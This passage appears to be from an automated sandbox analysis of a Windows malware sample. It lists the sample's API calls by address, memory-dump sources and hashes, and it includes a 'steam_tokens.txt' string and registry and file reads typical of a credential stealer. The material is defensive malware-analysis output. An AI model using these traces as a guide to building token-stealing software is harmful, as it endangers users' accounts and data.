                          • lstrcpy.KERNEL32(00000000,?), ref: 007EEA53
                          • lstrcat.KERNEL32(?,00000000), ref: 007EEA61
                          • lstrcat.KERNEL32(?,00801794), ref: 007EEA7A
                          • lstrcat.KERNEL32(?,012591D8), ref: 007EEA8D
                          • lstrcat.KERNEL32(?,00801794), ref: 007EEA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 5c27300cc0c6f778a2b7ae5545e621b8daa09457cf5e8c843705c56984f4afa3
                          • Instruction ID: 0c16ffae1a975c62e506dba41ccf63f9ffb9b667ab6eb62fc77f565d0ab137cb
                          • Opcode Fuzzy Hash: 5c27300cc0c6f778a2b7ae5545e621b8daa09457cf5e8c843705c56984f4afa3
                          • Instruction Fuzzy Hash: 5741947191011CEBCB55EFA4DC45BEE7378FF98300F004469BA16A7342DE789E468B54
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EECDF
                          • lstrlen.KERNEL32(00000000), ref: 007EECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EED1D
                          • lstrlen.KERNEL32(00000000), ref: 007EED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 007EED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: 38acbf46d428bbcfa69814ddc117658846b8de3a7cea92d735c2dc3c0667939e
                          • Instruction ID: 48d346cacbb2c4555fd392d6ca135c0e38db9920af6dec772084d37000f9a99e
                          • Opcode Fuzzy Hash: 38acbf46d428bbcfa69814ddc117658846b8de3a7cea92d735c2dc3c0667939e
                          • Instruction Fuzzy Hash: D8315E71A111599BC722FB79EC4EA6E77B8EF94300F04A521B846EB313DA2CDC078791
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,007D140E), ref: 007D9A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,007D140E), ref: 007D9AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,007D140E), ref: 007D9AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,007D140E,00000000,?,?,?,007D140E), ref: 007D9AE0
                          • LocalFree.KERNEL32(?,?,?,?,007D140E), ref: 007D9B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,007D140E), ref: 007D9B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 393e6c8bbebaf98feb6dc71ce2cb424cadfebdd74bdc97bf86074b2c2a7e558e
                          • Instruction ID: 2e3f4d0a6ff49269ec8c77483c805acd8ee7a47ee294e1e4e0537cbf831251c2
                          • Opcode Fuzzy Hash: 393e6c8bbebaf98feb6dc71ce2cb424cadfebdd74bdc97bf86074b2c2a7e558e
                          • Instruction Fuzzy Hash: BD1121B1600219AFE710DFA9DC89EAB777CEB45740F10425AFA15A6280EB749D42CB64
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5B14
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 007F5B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 007F5B89
                          • memmove.MSVCRT(00000000,?,?), ref: 007F5B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: dbd647d051032a507927a948723650940860052e099edee08da62ea2aeae1991
                          • Instruction ID: 3310620b6f3c47110e3cbff861ca3073fd763d80f9fc05ab05330c63b376ef74
                          • Opcode Fuzzy Hash: dbd647d051032a507927a948723650940860052e099edee08da62ea2aeae1991
                          • Instruction Fuzzy Hash: 3C4161B1B005199FCF08DF6CC995A7EBBB5EB89310F158229EA19E7344E634DD00CB90
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7D58
                            • Part of subcall function 007FA1C0: std::exception::exception.LIBCMT ref: 007FA1D5
                            • Part of subcall function 007FA1C0: std::exception::exception.LIBCMT ref: 007FA1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: f6b63f7ffda7448aad7334d79456439d9d9f6a8e80dfc40868a4d7a5a9370050
                          • Instruction ID: 166c8373626c8cb8bc161aa787fb064c3531947c3651ef4d83a7ecc75a8ad321
                          • Opcode Fuzzy Hash: f6b63f7ffda7448aad7334d79456439d9d9f6a8e80dfc40868a4d7a5a9370050
                          • Instruction Fuzzy Hash: 3421E6313052449BD728DE6DDC80A3AB7E5FF99720B204A6EE556CB381E775DC00C3A1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F33EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F33F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 007F3411
                          • wsprintfA.USER32 ref: 007F3437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: 38efe877d75a47e1e7ec4a9beb877874dff9bed875ad7fa878ff513b711d2e83
                          • Instruction ID: 323634dc629c28ec5368057ebb3c3ac03af1bbf79c3d4df3e69118084ce6b68f
                          • Opcode Fuzzy Hash: 38efe877d75a47e1e7ec4a9beb877874dff9bed875ad7fa878ff513b711d2e83
                          • Instruction Fuzzy Hash: BE01B5B1A0461CABDB04DF98DC49B7FB7B8FB44710F004229FA06E7780D778990186A5
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0125DBD0,00000000,00020119,?), ref: 007ED7F5
                          • RegQueryValueExA.ADVAPI32(?,0125E310,00000000,00000000,00000000,000000FF), ref: 007ED819
                          • RegCloseKey.ADVAPI32(?), ref: 007ED823
                          • lstrcat.KERNEL32(?,00000000), ref: 007ED848
                          • lstrcat.KERNEL32(?,0125E3D0), ref: 007ED85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 96b80f64f79ac94746372950143be12ac48f96970f2633e7f6becd39e5c868f7
                          • Instruction ID: 8435b8662a466404d829b64cc59f4650bba593b15f5b47c531b61e1c8ae23f35
                          • Opcode Fuzzy Hash: 96b80f64f79ac94746372950143be12ac48f96970f2633e7f6becd39e5c868f7
                          • Instruction Fuzzy Hash: A4416171A1020CEBDB54EFA4EC86BDE7774AF94304F408065B90997251EE38AE578B91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E7F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E7F60
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E7FA5
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E7FD3
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E8007
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: dd2693d2d42a943b6ec5fa763beb65b2128f6d8f14a328cccd34978968ecc057
                          • Instruction ID: 70ac9489dee2f4062a58e5d81ae34b28feb59498acabfa5a9d8f08b4310faf6c
                          • Opcode Fuzzy Hash: dd2693d2d42a943b6ec5fa763beb65b2128f6d8f14a328cccd34978968ecc057
                          • Instruction Fuzzy Hash: 7F41C17060511ADFDB20DFA9D884EAEB7B4FF58300B114099E805EB351DB78EA67CB91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E80BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E80EA
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E8102
                          • lstrlen.KERNEL32(00000000), ref: 007E8140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 5011d5572da0631070cac3dfcf315f61308e10cd258714c3d2576ad321052812
                          • Instruction ID: eb100874b9611e6397eca23b083435e8d07ec4b69efa2e33f2f1a73cb64f539d
                          • Opcode Fuzzy Hash: 5011d5572da0631070cac3dfcf315f61308e10cd258714c3d2576ad321052812
                          • Instruction Fuzzy Hash: F441AE7160010ADBDB61DFB9D988BAABBF4EF48300F10851DA849D7245EF38ED46CB91
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 007F1B72
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F184F
                            • Part of subcall function 007F1820: lstrlen.KERNEL32(01247318), ref: 007F1860
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007F1887
                            • Part of subcall function 007F1820: lstrcat.KERNEL32(00000000,00000000), ref: 007F1892
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007F18C1
                            • Part of subcall function 007F1820: lstrlen.KERNEL32(00804FA0), ref: 007F18D3
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007F18F4
                            • Part of subcall function 007F1820: lstrcat.KERNEL32(00000000,00804FA0), ref: 007F1900
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007F192F
                          • sscanf.NTDLL ref: 007F1B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 007F1BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 007F1BC6
                          • ExitProcess.KERNEL32 ref: 007F1BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: 175cd38f64828a1c175fd798ed1282bc6ad6148796bbf5c314e3b78f083c8220
                          • Instruction ID: bfd0aed8324d62e62069c98cb15e23812bb1047ed9b25613f5f4bbf8dae8d71a
                          • Opcode Fuzzy Hash: 175cd38f64828a1c175fd798ed1282bc6ad6148796bbf5c314e3b78f083c8220
                          • Instruction Fuzzy Hash: EB21E4B1518305EF8350DFA5D88496BBBF8EED8314F409A1EF599C3220E734D5068BA6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F3166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F316D
                          • RegOpenKeyExA.ADVAPI32(80000002,0124C208,00000000,00020119,?), ref: 007F318C
                          • RegQueryValueExA.ADVAPI32(?,0125DB50,00000000,00000000,00000000,000000FF), ref: 007F31A7
